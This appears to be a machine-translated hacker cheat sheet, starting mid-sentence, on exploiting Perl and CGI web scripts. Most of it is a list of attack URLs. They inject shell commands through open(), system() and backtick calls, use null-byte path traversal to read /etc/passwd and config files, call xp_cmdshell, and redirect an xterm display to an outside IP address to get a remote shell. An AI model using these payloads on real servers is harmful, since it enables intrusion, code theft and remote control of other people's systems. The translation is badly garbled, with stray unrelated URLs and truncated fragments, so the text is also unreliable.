Cookie spoofing, local submission), find executable directories and related functions, and use shell ......"

Elevation of Privilege

Thanks to the wisdom of EMM and PS and their superb script technology, as well as the old Red 4 script group, British and Foreign coolders

Note: Most Perl script vulnerabilities are found in open(), system(), or '' calls. The former allows read/write and execution, and the latter two allow execution. If you send a form using the POST method, it cannot be crossed (% 00 will not be parsed), so most of us use GET:

Http://target.com/cgi-bin/home/news/sub.pl? 12 arbitrary construction
Http://target.com/cgi-bin/home/news/sub.pl? & Change the character. You may be able to execute it.
Http://target.com/cgi-bin/home/news/sub.pl? 'LS' single quotes
Http://target.com/cgi-bin/home/news/sub.pl? 'Id ';
Http://target.com/cgi-bin/home/news/sub.pl? 'Ifs = !; Uname! -'
Http://target.com/cgi-bin/home/news/sub.pl? 'Cat <; '/home1/siteadm/cgi-bin/home/news/Sub. pl' is a good idea. Let's show the code cat back.
Http://target.com/test.pl;ls
Http://target.com/index.cgi? Page = | LS +-La +/% 0aid % 0 awhich + xterm |
Http://target.com/index.cgi? Page = | xterm +-isplay + 10.0.1.21: 0.0 + % 26 |
Http://target.com/test.pl? The operation and command execution in 'id' is similar to that in ''. For example, cat <'/home1/siteadm/cgi-bin/home/news/test. pl ''shows the PL code.
Http://target.com/index.cgi? Page =; Dir + C :\| & cid = 03417

SQL Injection similar to ASP

Http://target.com/test.pl? & ....../Http://www.cnblogs.com/etc/passwd
Http://www.target.org/cgi-bin/cl... info. pl? User =./Add./before test ./
Http://www.target.org/cgi-bin/cl... nfo. pl? User = test % 00. Note that % 00 will not be lost.
Http://www.target.org/cgi-bin/cl... http://www.cnblogs.com/etc/passwd%00
Http://www.target.org/show.php? F ../include/config. php view PHP code
Http://www.target.org/show.php? F... ng/admin/global. php

One sentence for EMM and PS

Http://www.target.org/cgi-bin/cl.../http://www.cnblogs.com/../bin/ls%20 > BBB % 20 |
Http://www.target.org/cgi-bin/club/scripts+'less showpost. pl \ 'and find the \'/\ '\ 'select \' string
Http://www.target.org/cgi-bin/cl... bin/sh. Elf? Ls +/HTTP here elf is a feature of the CCS Chinese Linux operating system
Http://www.target.org/csapi/.?c0=afhttp/china.sh?#.elf= ?" + & + LS +/bin

Script technology with the suffix of HTML continues to be dug deep, but it cannot be questioned that submitting data query statements is also a perfect method.

Http://target.com/index.html#cmd.exe
Http://target.com/index.html? Dummyparam = xp_mongoshell;
Lynxhttp: // target.com/cgi-bin/htmlscript? Http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd; |